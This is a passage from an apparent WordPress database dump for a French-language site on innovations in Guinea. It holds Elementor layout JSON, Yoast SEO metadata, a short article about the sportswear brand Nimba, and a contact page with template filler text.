5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":60.524},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.475},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2431,777,'_elementor_version','0.4'),(2433,603,'_elementor_edit_mode','builder'),(2434,603,'_elementor_data','[{\"id\":\"ektduot\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ztjkdwh\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"oqdpiml\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Guin\\u00e9e Sport est g\\u00e9r\\u00e9e par une dame qui entend faire de la marque Nimba une fiert\\u00e9 nationale. La nouvelle ligne de maillot a \\u00e9t\\u00e9 pr\\u00e9sent\\u00e9e aux Guin\\u00e9ens \\u00e0 la bluezone de Conakry.<\\/p><p>Apr\\u00e8s deux ans, Guin\\u00e9e Sport a enfin r\\u00e9ussi \\u00e0 pr\\u00e9senter sa marque de v\\u00eatements de sport. Cette jeune entreprise offre quinze emplois fixes. La nouvelle marque Nimba a \\u00e9t\\u00e9 pr\\u00e9sent\\u00e9e aux Guin\\u00e9ens \\u00e0 travers un d\\u00e9fil\\u00e9 et une exposition vente de maillots \\u00e0 Conakry.<\\/p><div><div class=\\\"wsw\\\"><p>Guin\\u00e9e Sport propose des maillots pour toutes les disciplines sportives et souhaite se faire accompagner par les autorit\\u00e9s sportives guin\\u00e9ennes.<\\/p><p>Avec ses sept machines \\u00e0 coudre, Guin\\u00e9e Sport a sign\\u00e9 avec trois clubs de football de premi\\u00e8re division, l\\u2019\\u00e9quipe nationale de handball et plusieurs \\u00e9quipes scolaires et universitaires de Guin\\u00e9e.<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9wrqrny\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"85cys9s\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"kxp87kg\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=4McQdO9Hwd0\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(2437,778,'_elementor_edit_mode','builder'),(2438,778,'_elementor_data','[{\"id\":\"ektduot\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ztjkdwh\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"oqdpiml\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Guin\\u00e9e Sport est g\\u00e9r\\u00e9e par une dame qui entend faire de la marque Nimba une fiert\\u00e9 nationale. La nouvelle ligne de maillot a \\u00e9t\\u00e9 pr\\u00e9sent\\u00e9e aux Guin\\u00e9ens \\u00e0 la bluezone de Conakry.<\\/p><p>Apr\\u00e8s deux ans, Guin\\u00e9e Sport a enfin r\\u00e9ussi \\u00e0 pr\\u00e9senter sa marque de v\\u00eatements de sport. Cette jeune entreprise offre quinze emplois fixes. La nouvelle marque Nimba a \\u00e9t\\u00e9 pr\\u00e9sent\\u00e9e aux Guin\\u00e9ens \\u00e0 travers un d\\u00e9fil\\u00e9 et une exposition vente de maillots \\u00e0 Conakry.<\\/p><div><div class=\\\"wsw\\\"><p>Guin\\u00e9e Sport propose des maillots pour toutes les disciplines sportives et souhaite se faire accompagner par les autorit\\u00e9s sportives guin\\u00e9ennes.<\\/p><p>Avec ses sept machines \\u00e0 coudre, Guin\\u00e9e Sport a sign\\u00e9 avec trois clubs de football de premi\\u00e8re division, l\\u2019\\u00e9quipe nationale de handball et plusieurs \\u00e9quipes scolaires et universitaires de Guin\\u00e9e.<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2439,603,'_elementor_version','0.4'),(2443,416,'_yoast_wpseo_primary_category',''),(2444,416,'_yst_is_cornerstone','1'),(2445,416,'_yoast_wpseo_focuskw_text_input','Architecte Guinée'),(2446,416,'_yoast_wpseo_focuskw','Architecte Guinée'),(2447,416,'_yoast_wpseo_linkdex','20'),(2448,416,'_yoast_wpseo_content_score','30'),(2451,360,'_yst_is_cornerstone','1'),(2452,360,'_yoast_wpseo_focuskw_text_input','Innovations en Guinée'),(2453,360,'_yoast_wpseo_focuskw','Innovations en Guinée'),(2454,360,'_yoast_wpseo_title','Guinée innovations'),(2455,360,'_yoast_wpseo_metadesc','Informations sur les innovations les plus pertinentes de la Guinée Conakry.'),(2456,360,'_yoast_wpseo_linkdex','15'),(2457,360,'_yoast_wpseo_content_score','60'),(2458,378,'_yoast_wpseo_title','Guinée innovations'),(2459,378,'_yoast_wpseo_metadesc','Toutes les innovations de la Guinée dans le domaine agricole.'),(2460,378,'_yoast_wpseo_content_score','30'),(2461,385,'_yst_is_cornerstone','1'),(2462,385,'_yoast_wpseo_focuskw_text_input','Culture de la Guinée'),(2463,385,'_yoast_wpseo_focuskw','Culture de la Guinée'),(2464,385,'_yoast_wpseo_title','Guinée innovations'),(2465,385,'_yoast_wpseo_metadesc','Toutes les innovations de la Guinée dans le domaine culturel.'),(2466,385,'_yoast_wpseo_linkdex','8'),(2467,385,'_yoast_wpseo_content_score','30'),(2468,380,'_yst_is_cornerstone','1'),(2469,380,'_yoast_wpseo_focuskw_text_input','Innovations en Guinée'),(2470,380,'_yoast_wpseo_focuskw','Innovations en Guinée'),(2471,380,'_yoast_wpseo_title','Guinée innovations'),(2472,380,'_yoast_wpseo_metadesc','Toutes les innovations Economiques de la Guinée.'),(2473,380,'_yoast_wpseo_linkdex','4'),(2474,380,'_yoast_wpseo_content_score','30'),(2475,780,'_elementor_edit_mode','builder'),(2476,780,'_elementor_data','[{\"id\":\"gxjwvcb\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"stretch_section\":\"section-stretched\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"otnhjxz\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"section_background_overlay\":\"\"},\"elements\":[{\"id\":\"rjicyqi\",\"elType\":\"widget\",\"settings\":{\"section_map\":\"\",\"address\":\"kaloum, Conakry\",\"height\":{\"unit\":\"px\",\"size\":\"450\"},\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"azpxljo\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"80\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"bwdywrb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"39.982\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"section_background_overlay\":\"\"},\"elements\":[{\"id\":\"rczmttr\",\"elType\":\"widget\",\"settings\":{\"section_magzma_contact_form_general_control\":\"\",\"form_select\":\"4\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-contact-form\"}],\"isInner\":false},{\"id\":\"zgqebrx\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"60.018\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"50\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"section_background_overlay\":\"\"},\"elements\":[{\"id\":\"dwgbkxq\",\"elType\":\"widget\",\"settings\":{\"section_title\":\"\",\"html\":\"<p style=\\\"font-size: 16px; color: #999999;\\\">In case you some questions popped in your mind, Feel free to call, email or even visit us. Also you can write us about whatever you want down below.\\u00a0Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut suscipit odio ante, id dapibus elit condimentum vitae. Maecenas eget orci vitae enim accumsan mollis. In congue nunc velit, sit amet eleifend velit cursus vitae.<\\/p>\\n\\n<p style=\\\"font-size: 16px; color: #999999;\\\"><strong>Telephone :<\\/strong> +0028 55 67 67<\\/p>\\n\\n<p style=\\\"font-size: 16px; color: #999999;\\\"><strong>Email :<\\/strong> jennier_aster@yourdomain.com<\\/p>\\n\\n<p style=\\\"font-size: 16px; color: #999999;\\\"><strong>Address :<\\/strong> 590 Tahoe Keys Blvd Lake Tahoe, CA 96150 - United States<\\/p>\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"html\"}],\"isInner\":false}],\"isInner\":false}]'),(2477,780,'_elementor_version','0.4'),(2478,780,'_elementor_css','a:3:{s:4:\"time\";i:1508775575;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2479,781,'_elementor_edit_mode','builder'),(2480,781,'_elementor_data','[{\"id\":\"gxjwvcb\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"stretch_section\":\"section-stretched\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"otnhjxz\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"section_background_overlay\":\"\"},\"elements\":[{\"id\":\"rjicyqi\",\"elType\":\"widget\",\"settings\":{\"section_map\":\"\",\"address\":\"kaloum, Conakry\",\"height\":{\"unit\":\"px\",\"size\":\"450\"},\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"azpxljo\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"80\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"bwdywrb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"39.982\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"section_background_overlay\":\"\"},\"elements\":[{\"id\":\"rczmttr\",\"elType\":\"widget\",\"settings\":{\"section_magzma_contact_form_general_control\":\"\",\"form_select\":\"4\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-contact-form\"}],\"isInner\":false},{\"id\":\"zgqebrx\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"60.018\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"50\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"section_background_overlay\":\"\"},\"elements\":[{\"id\":\"dwgbkxq\",\"elType\":\"widget\",\"settings\":{\"section_title\":\"\",\"html\":\"<p style=\\\"font-size: 16p\\n\\n<p style=\\\"font-size: 16px; color: #999999;\\\"><strong>Telephone :<\\/strong> +224 625 27 22 90<\\/p>\\n\\n<p style=\\\"font-size: 16px; color: #999999;\\\"><strong>Email :<\\/strong> fmbangoura7@gmail.com<\\/p>\\n\\n<p style=\\\"font-size: 16px; color: #999999;\\\"><strong>Addresse :<\\/strong> Koul\\u00e9wondy Kaloum<\\/p>\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"html\"}],\"isInner\":false}],\"isInner\":false}]'),(2481,781,'_elementor_version','0.4'),(2483,538,'_yst_is_cornerstone','1'),(2484,538,'_yoast_wpseo_focuskw_text_input','Guinée innovations'),(2485,538,'_yoast_wpseo_focuskw','Guinée innovations'),(2486,538,'_yoast_wpseo_title','Guinée innovations'),(2487,538,'_yoast_wpseo_metadesc','Toutes les innovations de la Guinée en un seul endroit.'),(2488,538,'_yoast_wpseo_linkdex','6'),(2489,538,'_yoast_wpseo_content_score','30'),(2490,383,'_yoast_wpseo_focuskw_text_input','Innovations en Guinée'),(2491,383,'_yoast_wpseo_focuskw','Innovations en Guinée'),(2492,383,'_yoast_wpseo_title','Guinée innovations'),(2493,383,'_yoast_wpseo_metadesc','Toutes les innovations de la Guinée dans le domaine de la santé.'),(2494,383,'_yoast_wpseo_linkdex','10'),(2495,383,'_yoast_wpseo_content_score','30'),(2496,359,'_yst_is_cornerstone','1'),(2497,359,'_yoast_wpseo_focuskw_text_input','Guinée innovations'),(2498,359,'_yoast_wpseo_focuskw','Guinée innovations'),(2499,359,'_yoast_wpseo_title','Guinée innovations'),(2500,359,'_yoast_wpseo_metadesc','Toutes les innovations des Guinéens en un seul endroit.'),(2501,359,'_yoast_wpseo_linkdex','2'),(2502,359,'_yoast_wpseo_content_score','30'),(2503,526,'_yst_is_cornerstone','1'),(2504,526,'_yoast_wpseo_focuskw_text_input','Innovations en Guinée'),(2505,526,'_yoast_wpseo_focuskw','Innovations en Guinée'),(2506,526,'_yoast_wpseo_metadesc','Toutes les innovations de la Guinée dans le domaine du sport.'),(2507,526,'_yoast_wpseo_content_score','30'),(2512,662,'_yoast_wpseo_primary_category',''),(2513,662,'_yoast_wpseo_focuskw_text_input','Santé Afrique'),(2514,662,'_yoast_wpseo_focuskw','Santé 